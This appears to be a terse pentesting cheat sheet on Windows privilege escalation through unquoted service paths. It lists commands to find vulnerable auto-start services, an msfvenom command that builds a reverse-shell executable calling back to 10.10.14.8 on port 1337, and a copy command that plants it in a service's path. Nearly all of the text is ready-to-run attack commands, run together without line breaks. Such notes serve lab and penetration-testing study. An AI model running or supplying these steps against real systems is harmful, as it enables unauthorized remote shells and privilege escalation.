Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """sc.exe qc iobitunsvrsc.exe sdshow iobitunsvrCreate and drop a malicious executable
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1337 -f exe -o Common.execopy C:\programdata\Common.exe C:\Program Files\Unquoted Path Service\Common.exeLast updated